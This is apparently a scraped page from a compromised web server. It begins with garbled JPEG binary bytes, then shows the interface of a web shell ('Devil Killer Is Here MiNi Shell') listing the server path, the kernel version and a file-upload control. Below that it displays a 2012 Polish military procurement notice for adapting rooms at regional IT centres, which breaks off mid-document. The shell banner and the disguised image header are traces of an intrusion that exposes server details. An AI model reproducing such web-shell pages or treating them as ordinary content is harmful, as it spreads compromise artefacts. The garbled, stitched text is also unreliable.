JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120328/96830-N-2012.html

<p class="kh_header"><b>Warszawa: Adaptacja pomieszczeń na potrzeby Regionalnych Ośrodków Przetwarzania Informacji,
Adaptacja pomieszczeń na potrzeby Zespołu Informatyki 2KZ.</b><br>
<b>Numer ogłoszenia: 96830 - 2012; data zamieszczenia: 28.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Resortowe Centrum Zarządzania Sieciami i Usługami  Teleinformatycznymi , ul. Żwirki i Wigury 9/13, 00-909 Warszawa, woj. mazowieckie, tel. 22 6848363, 6847818, 6847272, faks 22 6847145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rczsiut.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja pomieszczeń na potrzeby Regionalnych Ośrodków Przetwarzania Informacji,
Adaptacja pomieszczeń na potrzeby Zespołu Informatyki 2KZ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem rzeczowym zamówienia o wartości szacunkowej 8 455,5 tys. zł jest adaptacja pomieszczeń na potrzeby Regionalnych Ośrodków Przetwarzania Informacji  oraz adaptacja pomieszczeń na potrzeby Zespołu Informatyki 2KZ.
zgodnie z projektami budowlanymi i  wykonawczymi,  specyfikacjami technicznymi wykonania i odbioru robót oraz przedmiarami robót.  
       Części składowa zamówienia 
                  - część 01 (zadanie 1) Adaptacja pomieszczeń na potrzeby Regionalnego Ośrodka Przetwarzania Informacji 
                                                         w Lublinie,
                  - część 02 (zadanie 2) Adaptacja pomieszczeń na potrzeby Regionalnego Ośrodka Przetwarzania Informacji 
                                                         w Olsztynie,
                  - część 03 (zadanie 3) Adaptacja pomieszczeń na potrzeby Regionalnego Ośrodka Przetwarzania Informacji 
                                                         w Szczecinie,
                  - część 04 (zadanie 4) Adaptacja pomieszczeń na potrzeby Regionalnego Ośrodka Przetwarzania Informacji 
                                                          w Krakowie, oraz adaptacja pomieszczeń na potrzeby Zespołu Informatyki 2KZ w Krakowie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.43.20-0, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający na etapie składania ofert przez Wykonawców będzie żądał od nich wniesienia wadium w kwocie: 
                 - część  01  - 21 000,00 zł (słownie złotych: dwadzieścia jeden tysięcy);
                 - część  02  - 16 000,00 zł (słownie złotych: szesnaście  tysięcy);
                 - część  03  - 16 000,00 zł (słownie złotych: szesnaście tysięcy);
                 - część  04  - 110 000,00 zł (słownie złotych: sto dziesięć tysięcy).
        Zabezpieczenia należytego wykonania umowy  5 % ceny całkowitej podanej w ofercie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać (dla każdej z części), że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień oraz zdolność do ochrony informacji niejawnych  wynikających  z Ustawy z dnia 05 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r. Nr 182, poz. 1228) w zakresie dostępu do informacji niejawnych oznaczonych klauzulą tajności poufne, oraz zdolność ich przetwarzania we własnym systemie teleinformatycznym o klauzuli tajności zastrzeżone.
I.     Potwierdzeniem zdolność do ochrony informacji niejawnych przez Wykonawcę w zakresie dostępu do informacji   niejawnych o klauzuli tajności poufne ( dla każdej z części) jest posiadanie:   
a)	świadectwa bezpieczeństwa przemysłowego II stopnia o klauzuli tajności co najmniej poufne,  
b)	systemu teleinformatycznego umożliwiającego przetwarzanie  informacji o klauzuli tajności co najmniej zastrzeżone spełniającego  wymagania określone w Ustawie z dnia 05 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r. Nr 182, poz. 1228) oraz Rozporządzeniu Prezesa Rady Ministrów z dnia 20 lipca 2011 r. w sprawie podstawowych wymagań bezpieczeństwa systemów i sieci teleinformatycznych (Dz. U. z 2011 r. Nr 159, poz.948),
c)	pracowników realizujący przedmiot zamówienia legitymujących się aktualnym poświadczenie bezpieczeństwa upoważniającym do dostępu do informacji niejawnych o klauzuli tajności poufne  
oraz posiadających aktualne zaświadczenie o odbyciu szkolenia w zakresie ochrony  informacji  niejawnych - (dotyczy:  kierowników budowy, robót,  geodety, kierownika robót  z   licencją pracownika  zabezpieczenia technicznego II stopnia zabezpieczeń technicznych klasy SA1-SA4, pracowników 
z licencją pracownika zabezpieczenia I stopnia, pozostali pracownicy ogólnobudowlani powinni się legitymować upoważnieniami uprawniającymi do dostępu do informacji o klauzuli zastrzeżone),
d) 	pełnomocnika ds. ochrony informacji niejawnych,
c)	osobę odpowiedzialną za ewidencjonowanie materiałów i dokumentów niejawnych oznaczonych klauzulą zastrzeżone, administratora systemu i inspektora bezpieczeństwa teleinformatycznego,
d)	opracowaną  przez pełnomocnika ochrony i zatwierdzoną przez kierownika jednostki organizacyjnej  
(zgodnie z art. 43 ust. 5 Ustawy), instrukcję dotyczącą sposobu i trybu przetwarzania  informacji 
niejawnych o klauzuli poufne oraz zakres i warunki stosowania środków bezpieczeństwa fizycznego 
w celu ich ochrony.
Ocena potwierdzenia czy wykonawca wykazał spełnienie warunków udziału III.3.1 nastąpi na podstawie wymaganych i załączonych przez Wykonawcę do wniosku  w sprawie zakwalifikowania do udziału w postępowaniu dokumentów i oświadczeń, wymienionych w Rozdziale III.6.
  Z dokumentów i oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania wniosku. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowaniu po wyczerpaniu czynności wezwania do uzupełnienia dokumentów (art. 26 ust 3).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia  (dla każdej części), zamawiający żąda by wykazał, iż wykonał  w okresie ostatnich pięciu  lat przed  upływem terminu składania wniosków 
o dopuszczenie udziału w postępowaniu, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, roboty budowlane  związane z przedmiotem zamówienia, przy czym za  takie roboty budowlane Zamawiający uzna dla każdej z części o numerach:
1)  01,02, 03 - roboty budowlane obejmujące należyte wykonanie, co najmniej trzech  zamówień polegających na 
     budowie lub przebudowie obiektu budowlanego  za kwotę co najmniej 500,0 tys. zł netto w tym instalacje 
     teletechniczne za kwotę co najmniej 300,0 tys. zł netto każda, zł wraz z załączonymi dokumentami 
     potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
     ukończone.
2) 04 - roboty budowlane obejmujące należyte wykonanie, co najmniej trzech  zamówień polegających na 
     budowie lub przebudowie obiektu budowlanego  za kwotę co najmniej 1 000,0 tys. zł netto w tym instalacje 
     teletechniczne za kwotę co najmniej 500,0 tys. zł netto każda, zł wraz z załączonymi dokumentami 
     potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
     ukończone.
            3.2.1  Wykonawca może polegać na wiedzy i doświadczeniu, innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami, (wiedzą i doświadczeniem) niezbędnym  do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Jeżeli Wykonawca wykazując spełnienie warunku dotyczącego posiadania wiedzy i doświadczenia do wykonania zamówienia, o których mowa w art. 22 ust. 1 pkt. 2  ustawy - Prawo zamówień publicznych, polega na wiedzy 
i doświadczeniu innych podmiotów na zasadach określonych w art. 26 ust 2b ustawy - Prawo zamówień publicznych, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w ust. III.4.2 i III.6.3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia,  zamawiający żąda, by wykonawca wykazał co najmniej (dla każdej części):
3.4.	   Osoby posiadające uprawnienia do kierowania robotami budowlanymi tj.:
3.4.1  	co najmniej jednym kierownikiem budowy, który posiada uprawnienia budowlane w specjalności konstrukcyjno-          budowlanej do kierowania robotami budowlanymi bez ograniczeń lub inne uprawnienia  umożliwiające wykonywanie tych samych czynności,  do wykonywania których w aktualnym stanie prawnym, uprawniają uprawnienia budowlane w tej specjalności;
3.4.2	co najmniej jednym kierownikiem robót, który posiada uprawnienia budowlane w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez 
ograniczeń lub inne uprawnienia  umożliwiające wykonywanie tych samych czynności,  do wykonywania których 
w aktualnym stanie prawnym, uprawniają uprawnienia budowlane w tej specjalności;
3.4.3	co najmniej jednym kierownikiem robót, który posiada uprawnienia budowlane w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub inne uprawnienia  umożliwiające wykonywanie tych samych czynności,  do wykonywania których w aktualnym stanie prawnym, uprawniają uprawnienia budowlane w tej specjalności;
3.4.4	co najmniej jednym kierownikiem robót, który posiada uprawnienia budowlane w specjalności architektonicznej bez ograniczeń lub inne uprawnienia  umożliwiające wykonywanie tych samych czynności,  do wykonywania których 
w aktualnym stanie prawnym, uprawniają uprawnienia budowlane w tej specjalności;
3.4.5	co najmniej jednym kierownikiem robót, który posiada  uprawnienia budowlanego do kierowania robotami 
budowlanymi  w specjalności telekomunikacyjnej w ograniczonym zakresie  uprawniające do kierowania robotami budowlanymi związanymi z obiektem budowlanym wraz z infrastrukturą telekomunikacyjną, w odniesieniu do obiektu budowlanego, takiego jak: lokalne linie i instalacje lub inne uprawnienia umożliwiające wykonywanie 
tych samych czynności, do wykonywania  których w aktualnym stanie prawnym, uprawniają uprawnienia 
budowlane w tej specjalności;
3.4.6	co najmniej jednym kierownikiem robót z licencją pracownika zabezpieczenia technicznego II stopnia zabezpieczeń technicznych klasy SA1-SA4;
3.4.7	co najmniej jednym geodetą, który posiada  uprawnienia zawodowe w zakresie - geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne w (przypadku realizacji części 04).
3.4.8	osoby wykonujące roboty budowlane tj. monterzy w specjalnościach odpowiednich do zakresu wykonywanych prac: w specjalności telekomunikacyjne linie kablowe, instalacje elektryczne, sanitarne, pracownicy ogólnobudowlani, pracownicy z licencją pracownika zabezpieczenia I stopnia.
   	Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie
od charakteru  prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest  udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, (osobami) 
w szczególności przedstawiając w tym zakresie pisemne zobowiązanie tych podmiotów do oddania mu do   dyspozycji niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia. Jeżeli Wykonawca wykazując spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania
zamówienia, o których mowa w art. 22 ust. 1 pkt. 3 ustawy - Prawo zamówień publicznych, polega na osobach zdolnych do wykonania zamówienia innych podmiotów na zasadach określonych w art. 26 ust 2b ustawy - Prawo 
zamówień publicznych, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w ust. III.4.2., i III.6.3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.5
	Dla uznania, że wykonawca spełnia warunek sytuacji ekonomicznej zamawiający żąda, by Wykonawca wykazał 
że:
   3.5.1	posiada opłaconą polisę ubezpieczeniową lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę 
ubezpieczenia nie niższą niż 700 000,00 zł (w przypadku dla części 01, 02, 03), a (dla części 04 - na sumę 
ubezpieczenia nie niższą niż 1 500 000,00 zł.  
3.6	Dla uznania, że wykonawca spełnia warunek zdolności finansowej  zamawiający żąda, by Wykonawca wykazał że:
3.6.1	posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż  700 000,00 zł  - dla  części 01,
02, 03), dla części 04 - nie niższą niż 1 500 000,00 zł.  


      1.  Ocena potwierdzenia czy wykonawca wykazał spełnienie warunków udziału, zawartych w ust. od III.3.2 - do 
      III.3.5 nastąpi na podstawie wymaganych i załączonych przez Wykonawcę do wniosku w sprawie 
      zakwalifikowania do udziału w postępowaniu dokumentów i oświadczeń wymienionych w Rozdziale III.4 
      a w zakresie spełnienia warunków wynikających z Ustawy o ochronie informacji niejawnych dokumentów 
      i oświadczeń  wymienionych w Rozdziale III.6.	 
         Z dokumentów i oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania wniosku. 
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tych warunków spowoduje wykluczenie wykonawcy z postępowaniu po wyczerpaniu czynności wezwania do uzupełnienia dokumentów (art. 26 ust 3). 
              2.   Jeżeli wykonawca wykaże, że spełnienia warunki udziału w postępowaniu o których mowa w ust  III.3.2 i III.3.5  
                     polegając na zasobach innych podmiotów niezależnie od charakteru prawnego łączącego go nim stosunków
                      a nie udowodni, iż będzie dysponował zasobami niezbędnymi na czas realizacji części  zamówienia, zamawiający 
                     wykluczy wykonawcę z postępowania o udzielenie zamówienia w oparciu o przesłankę zawartą w art. 24 ust. 
                     2 pkt. 4.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	świadectwa bezpieczeństwa przemysłowego II stopnia o klauzuli tajności co najmniej poufne,  
2)	oświadczenie, że Firma posiada system teleinformatyczny do przetwarzania informacji niejawnych o klauzuli  tajności co najmniej zastrzeżone a osoby realizujące przedmiot w szczególności odpowiedzialne za świadczenie usług, kontrolę ochrony informacji niejawnych, kontrolę jakości tj. kierownicy budowy, robót   posiadają świadectwa bezpieczeństwa  upoważniające do dopuszczeniu do prac związanych z dostępem danej osoby do informacji niejawnych o klauzuli tajności poufne, (pracownicy budowlany wszystkich specjalności mogą  posiadać świadectwa bezpieczeństwa  upoważniające do dopuszczeniu do prac związanych z dostępem danej osoby do informacji niejawnych o klauzuli tajności zastrzeżone/pisemne upoważnienie kierownika jednostki organizacyjnej o dopuszczeniu danej osoby do  informacji niejawnych 
o klauzuli tajności zastrzeżone) oraz aktualne zaświadczenia o przeszkoleniu w zakresie ochrony informacji niejawnych wg wzoru zamieszczonego wraz z wnioskiem w sprawie zakwalifikowania do udziału 
w postępowaniu przetargowym na stronie internetowej zamawiającego,
3)	uczestnik konsorcjum lub podwykonawca składa świadectwo bezpieczeństwa przemysłowego co najmniej III stopnia o klauzuli poufne, 
4)	podmiot zagraniczny składa  dokumenty określone w art. 54 ust 1- 4 ustawy z dnia 05 sierpnia 2010 r. 
o ochronie informacji niejawnych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
